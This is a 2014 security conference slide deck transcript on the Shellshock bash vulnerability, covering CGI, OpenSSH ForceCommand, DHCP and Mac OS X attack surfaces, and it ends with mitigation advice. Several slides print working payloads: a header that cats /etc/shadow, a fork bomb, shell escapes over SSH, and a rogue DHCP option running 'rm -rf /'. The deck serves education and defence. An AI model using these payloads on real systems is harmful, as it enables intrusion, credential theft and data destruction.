Upgrade to Pro — share decks privately, control downloads, hide ads and more …

ShellShock

Julien Savoie
September 29, 2014
Technology
0
100

 ShellShock

The talk I gave at HASK in 2014 on the vulnerability in bash known as shellshock.

Julien Savoie

September 29, 2014
Tweet

More Decks by Julien Savoie

See All by Julien Savoie
Passwords! Passwords! Passwords! 2022
jsavoie
0
64
Defeating IPv6 privacy extensions
jsavoie
0
110
Bitcoin Barons
jsavoie
0
82
Software defined murder
jsavoie
1
260
Passwords! Passwords! Passwords!
jsavoie
0
320
How to run a dark market
jsavoie
2
340
Encrypting the Cloud
jsavoie
0
49
Attacking the onion router
jsavoie
0
170

Other Decks in Technology

See All in Technology
SREとその組織類型
tatsuo48
8
1.4k
Microsoft Cloudで 開発ライフサイクルを保護する
kkamegawa
0
130
コンパウンドスタートアップのためのスケーラブルでセキュアなInfrastructure as Codeパイプラインを考える / Scalable and Secure Infrastructure as Code Pipeline for a Compound Startup
yuyatakeyama
0
220
Pedestrian-Centric大規模交通安全映像解析向けWoven Traffic Safety (WTS) データセットの紹介
kbuster
0
140
OpenTelemetry を使ったトレースエグザンプラーの活用 / otel-trace-exemplar
k6s4i53rx
2
560
OPENLOGI Company Profile for engineer
hr01
1
1.1k
Tebiki株式会社 エンジニア採用資料
tebiki
0
4k
AWS を使う上で知っておきたいオンプレミス知識/aws-on-premise-essentials
emiki
0
3.9k
OPENLOGI Company Profile
hr01
0
43k
シン・Kafka / shin-kafka
oracle4engineer
PRO
6
2.6k
社内勉強会運営のコツ
senoo
6
1.1k
入社後初めてのタスクでk8sアップグレードした話.pdf
kkato1
0
360

Featured

See All Featured
In The Pink: A Labor of Love
frogandcode
137
21k
Happy Clients
brianwarren
91
6.4k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
185
16k
Code Review Best Practice
trishagee
54
15k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
18
6.9k
Unsuck your backbone
ammeep
662
57k
The Invisible Customer
myddelton
114
12k
Keith and Marios Guide to Fast Websites
keithpitt
408
22k
Navigating Team Friction
lara
177
13k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
243
20k
Raft: Consensus for Rubyists
vanstee
130
6.2k
Gamification - CAS2011
davidbonilla
76
4.6k

Transcript

  1. CVE-2014-6271 CVE-2014-7169 "shellshock"

  2. • Who does it impact? Bash 1.13 to 4.3. If

    you installed bash from between 1992 to now. • Where is bash used?

  3. What's the attack? Define a function within an environment variable,

    whatever you place after will be executed. foo () { ignored; }; my attack code goes here. env bar='() { :; }; echo vulnerable' bash -c 'echo hello world' Output; vulnerable hello world

  4. Common Gateway to Hell • Any calls to cgi (common

    gateway interface) services pass http client header variables as environment variables. Such as "user-agent”, or “referer”. • User-agent switcher for Chrome; () { :; }; (){ :|: & };: • Nameless major vendor; () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/shadow

  5. People are already mass scanning 209.126.230.72 - - [24/Sep/2014:23:53:34 -0300]

    "GET / HTTP/1.0" 200 12761 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/ 2014/09/bash-shellshock-scan-of-internet.html)“

  6. OpenSSH isn't safe • From sshd_config: # Allow client to

    pass locale environment variables AcceptEnv LANG LC_* • This means ForceCommand can be escaped $ env LC_NINJA='() { :; }; /bin/sh' ssh victimhost • SSH_ORIGINAL_COMMAND is set anyways $ ssh victimhost '() { :; }; /bin/sh' • You use "internal-sftp" right? • Why do we care about ForceCommand?

  7. DHCP • dhcpcd/dhclient makes system() calls • Rogue DHCP servers

    can execute arbitrary commands on hosts (usually as uid=0) /etc/dhcp/dhcpd.conf: option default-url "() { :; }; rm -rf /"; • Consider using "ip dhcp snooping vlan 100,110,115,...”

  8. Et tu, Mac OS X? • Bash 3.2.51 is installed

    at /bin/sh • Can be leveraged to get root, suid anyone? • Apple dhcp client does not use system() calls

  9. What have we learned?

  10. What should we have learned? • Widely deployed OSS software

    should be audited, especially if old • Often they are, but not by nice people • Data received from untrusted sources should be sanitized, before used • Switch default shell? /bin/sh -> dash or tcsh • Disable function importing by default?